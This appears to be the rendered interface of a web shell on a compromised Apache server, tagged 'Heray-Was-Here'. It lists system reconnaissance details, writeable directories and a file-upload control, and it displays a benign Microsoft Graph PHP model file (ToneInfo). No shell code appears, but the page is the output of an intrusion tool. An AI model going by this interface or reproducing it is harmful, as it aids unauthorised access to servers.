Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/erp/htdocs/includes/microsoft/microsoft-graph/src/Model/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/erp/htdocs/includes/microsoft/microsoft-graph/src/Model/ToneInfo.php
<?php
/**
* Copyright (c) Microsoft Corporation.  All Rights Reserved.  Licensed under the MIT License.  See License in the project root for license information.
* 
* ToneInfo File
* PHP version 7
*
* @category  Library
* @package   Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license   https://opensource.org/licenses/MIT MIT License
* @link      https://graph.microsoft.com
*/
namespace Microsoft\Graph\Model;
/**
* ToneInfo class
*
* @category  Model
* @package   Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license   https://opensource.org/licenses/MIT MIT License
* @link      https://graph.microsoft.com
*/
class ToneInfo extends Entity
{
    /**
    * Gets the sequenceId
    * An incremental identifier used for ordering DTMF events.
    *
    * @return int|null The sequenceId
    */
    public function getSequenceId()
    {
        if (array_key_exists("sequenceId", $this->_propDict)) {
            return $this->_propDict["sequenceId"];
        } else {
            return null;
        }
    }

    /**
    * Sets the sequenceId
    * An incremental identifier used for ordering DTMF events.
    *
    * @param int $val The value of the sequenceId
    *
    * @return ToneInfo
    */
    public function setSequenceId($val)
    {
        $this->_propDict["sequenceId"] = $val;
        return $this;
    }

    /**
    * Gets the tone
    * Possible values are: tone0, tone1, tone2, tone3, tone4, tone5, tone6, tone7, tone8, tone9, star, pound, a, b, c, d, flash.
    *
    * @return Tone|null The tone
    */
    public function getTone()
    {
        if (array_key_exists("tone", $this->_propDict)) {
            if (is_a($this->_propDict["tone"], "\Microsoft\Graph\Model\Tone") || is_null($this->_propDict["tone"])) {
                return $this->_propDict["tone"];
            } else {
                $this->_propDict["tone"] = new Tone($this->_propDict["tone"]);
                return $this->_propDict["tone"];
            }
        }
        return null;
    }

    /**
    * Sets the tone
    * Possible values are: tone0, tone1, tone2, tone3, tone4, tone5, tone6, tone7, tone8, tone9, star, pound, a, b, c, d, flash.
    *
    * @param Tone $val The value to assign to the tone
    *
    * @return ToneInfo The ToneInfo
    */
    public function setTone($val)
    {
        $this->_propDict["tone"] = $val;
         return $this;
    }
}

Hry